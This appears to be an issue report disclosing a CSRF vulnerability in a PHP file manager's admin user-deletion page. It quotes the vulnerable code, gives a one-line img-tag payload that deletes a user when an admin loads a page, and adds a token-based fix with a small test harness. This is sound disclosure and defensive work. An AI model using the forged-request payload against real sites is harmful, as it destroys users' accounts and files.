Open ghost opened 7 years ago
/admin/manuser.php
```php
if (isset($_GET['delete'])) {
    // Remove every file owned by the user, on disk and in the database.
    $file_list = $db->select('file', array('owner' => $_GET['delete']));
    if (is_array($file_list)) {
        foreach ($file_list as $d) {
            @unlink(dirname(dirname(__FILE__)).'/file/'.$d['realname'].'.data');
            $db->delete('file', array('id' => $d['id']));
        }
    }
    // Remove every directory record owned by the user.
    $dir_list = $db->select('dir', array('owner' => $_GET['delete']));
    if (is_array($dir_list)) {
        foreach ($db->select('dir', array('owner' => $_GET['delete'])) as $d) {
            $db->delete('dir', array('id' => $d['id']));
        }
    }
    // Finally remove the user account itself.
    $db->delete('user', array('name' => $_GET['delete']));
    $alert = "<div class='alert alert-success'>刪除成功</div>";
}
```
Without a CSRF token, any existing user and his data could be deleted once the admin visits the following page:
<img src="http://localhost/admin/manuser.php?delete=victim" />
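One way to close this hole, shown as an added example that is not the project's own code: accept the delete only as a POST that carries a per-session token, compared with `hash_equals`. The names `csrf_token` and `handle_delete` and the `$deleteUser` callback are hypothetical; the callback stands in for the deletion logic in `manuser.php`, and the requests at the bottom are constructed.

```php
<?php
// Added example with hypothetical helper names; not code from the project.

// Per-session token, generated once from a CSPRNG and reused for the session.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Returns the HTTP status for a delete request. $deleteUser stands in for
// the deletion logic of manuser.php (files, dirs, then the user row).
function handle_delete(string $method, array $post, array &$session, callable $deleteUser): int {
    if ($method !== 'POST') {
        return 405; // <img> and link requests are GETs and stop here
    }
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 403; // a cross-site form cannot read the admin's token
    }
    if (!isset($post['delete']) || !is_string($post['delete']) || $post['delete'] === '') {
        return 400;
    }
    $deleteUser($post['delete']);
    return 200;
}

// Constructed requests; run from the CLI to see which ones are accepted.
if (PHP_SAPI === 'cli') {
    $session = [];   // stands in for $_SESSION
    $deleted = [];
    $del = function (string $name) use (&$deleted) { $deleted[] = $name; };
    $token = csrf_token($session);

    // The <img> request from the report: a GET without a token.
    var_dump(handle_delete('GET', [], $session, $del));
    // A forged cross-site POST that lacks the token.
    var_dump(handle_delete('POST', ['delete' => 'victim'], $session, $del));
    // The admin's own form, which embeds the token in a hidden field.
    var_dump(handle_delete('POST', ['delete' => 'victim', 'csrf_token' => $token], $session, $del));
    // Names actually passed to the deletion callback.
    var_dump($deleted);
}
```

In the real page, `$session` would be `$_SESSION` after `session_start()`, and the admin's delete button would become a POST form with the token in a hidden `csrf_token` field.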